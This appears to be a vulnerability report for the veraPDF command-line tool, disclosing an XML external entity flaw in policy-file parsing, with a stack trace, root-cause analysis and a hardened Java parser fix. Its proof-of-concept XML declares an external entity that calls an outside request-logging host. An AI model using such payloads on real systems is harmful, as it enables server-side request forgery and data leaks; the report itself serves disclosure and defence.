A malicious policyfile in XML passed to the veraPDF CLI can lead to an XXE vulnerability exploitation due to insecure use of the XML parser. The policyfile can be the attack payload, which is similar to the previously fixed issue #1415, but this vulnerability happens at a different place within the CLI tool, even before the XSL transformation happens.
### POC
Installed the latest veraPDF, installer downloaded from the website:
```
PS C:\Users\samym\Documents\verapdf-poc> verapdf --version
veraPDF 1.26.2
Built: Sun May 19 13:33:00 CST 2024
Developed and released by the veraPDF Consortium.
Funded by the PREFORMA project.
Released under the GNU General Public License v3
and the Mozilla Public License v2 or later.
```
Malicious policyfile, which doesn't have to be an xsl file to be parsed, poc.xml:
```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [<!ENTITY xxe SYSTEM "https://eo9k3koijwh1jvr.m.pipedream.net/poc">]>
<root>&xxe;</root>
```
https://eo9k3koijwh1jvr.m.pipedream.net is a malicious website I set up to log incoming requests for demo purposes only.
And prepare a PDF with any name, here test.pdf.
Execute:
```
PS C:\Users\samym\Documents\verapdf-poc> verapdf --policyfile .\poc.xml .\test.pdf
Exception in thread "main" org.verapdf.core.VeraPDFException: Policy file extension must be one of sch, xsl, or xslt
        at org.verapdf.policy.PolicyChecker.applyPolicy(PolicyChecker.java:125)
        at org.verapdf.cli.VeraPdfCliProcessor.applyPolicy(VeraPdfCliProcessor.java:247)
        at org.verapdf.cli.VeraPdfCliProcessor.processPaths(VeraPdfCliProcessor.java:107)
        at org.verapdf.cli.VeraPdfCli.singleThreadProcess(VeraPdfCli.java:142)
        at org.verapdf.cli.VeraPdfCli.main(VeraPdfCli.java:111)
        at org.verapdf.apps.GreenfieldCliWrapper.main(GreenfieldCliWrapper.java:54)
```
Though there was an exception when applying the policy, the vulnerability can still be triggered even before that.
Could see the request come in on my request bin anyway:
This vulnerability could be further exploited and lead to an information leak, SSRF and possibly RCE.
### Root cause analysis:
The problem is actually inside function mergeEnabledFeaturesFromPolicy under org.verapdf.apps.utils.ApplicationUtils: https://github.com/veraPDF/veraPDF-apps/blob/v1.27.88/gui/src/main/java/org/verapdf/apps/utils/ApplicationUtils.java#L171
The policyfile is parsed without secure settings on or external entities disabled, which finally leads to an XXE vulnerability. Also, this function is not only used by the veraPDF CLI but in other places as well, which means there could be more attack surface.
### Recommendations:
Enable secure processing of XML files:

```java
dbf.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
```

Or

Disable all external entities.
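The two recommendations above worked into one hardened `DocumentBuilderFactory`, as an added example that is not veraPDF's own code. The class name `HardenedPolicyParser`, the helper names, and the `http://placeholder.invalid/` URL in the constructed sample are assumptions; the feature and attribute names are the standard JAXP and Xerces ones supported by the JDK's built-in parser. The sample with a DOCTYPE has the same shape as poc.xml and is rejected before any entity is resolved, so no outbound request is made; a plain policy-like document still parses.

```java
import java.io.ByteArrayInputStream;
import java.io.IOException;
import java.nio.charset.StandardCharsets;
import javax.xml.XMLConstants;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;
import org.w3c.dom.Document;
import org.xml.sax.SAXException;

// Added example, not the veraPDF project's code: a policy-file parser with
// external entity resolution switched off.
public final class HardenedPolicyParser {

    // Builds a factory that applies both recommendations from the report.
    public static DocumentBuilderFactory hardenedFactory() throws ParserConfigurationException {
        DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
        // Recommendation 1: JAXP secure processing (entity expansion limits etc.).
        dbf.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
        // Recommendation 2: disable all external entities. A policy file never needs
        // a DOCTYPE, so refusing any DTD is the simplest complete rule; the remaining
        // features cover parsers where the DOCTYPE switch alone is not honoured.
        dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
        dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        dbf.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        // JAXP 1.5 access controls: no protocol may be used to fetch DTDs or schemas.
        dbf.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, "");
        dbf.setAttribute(XMLConstants.ACCESS_EXTERNAL_SCHEMA, "");
        dbf.setXIncludeAware(false);
        dbf.setExpandEntityReferences(false);
        return dbf;
    }

    // Parses policy XML bytes with the hardened factory. A document carrying a
    // DOCTYPE fails here with a SAXException before any entity is touched.
    public static Document parsePolicy(byte[] xml)
            throws ParserConfigurationException, SAXException, IOException {
        DocumentBuilder db = hardenedFactory().newDocumentBuilder();
        return db.parse(new ByteArrayInputStream(xml));
    }

    public static void main(String[] args) throws Exception {
        // Constructed sample: same shape as the report's poc.xml, placeholder URL.
        String withDoctype = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n"
                + "<!DOCTYPE root [<!ENTITY xxe SYSTEM \"http://placeholder.invalid/poc\">]>\n"
                + "<root>&xxe;</root>";
        // Constructed sample: an ordinary policy-like document with no DTD.
        String plain = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>"
                + "<policy><feature name=\"fonts\"/></policy>";

        try {
            parsePolicy(withDoctype.getBytes(StandardCharsets.UTF_8));
            System.out.println("UNEXPECTED: document with DOCTYPE was accepted");
        } catch (SAXException e) {
            // disallow-doctype-decl stops the parse at the DOCTYPE declaration.
            System.out.println("rejected as expected: " + e.getMessage());
        }

        Document doc = parsePolicy(plain.getBytes(StandardCharsets.UTF_8));
        System.out.println("parsed root element: " + doc.getDocumentElement().getTagName());
    }
}
```

Compile and run with `javac HardenedPolicyParser.java && java HardenedPolicyParser`. The same factory settings apply to `SAXParserFactory` and `XMLInputFactory` if the policy is read through a different API; the point is that every parser that touches user-supplied XML, including the one in `mergeEnabledFeaturesFromPolicy`, gets this configuration rather than only the XSL transformation path fixed in #1415.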
Hi team! Thank you for addressing and fixing the security issue I reported. To help other users identify and understand the implications of this fix, could we consider requesting a CVE number for this vulnerability? This would make it easier for users to track and assess any related security concerns.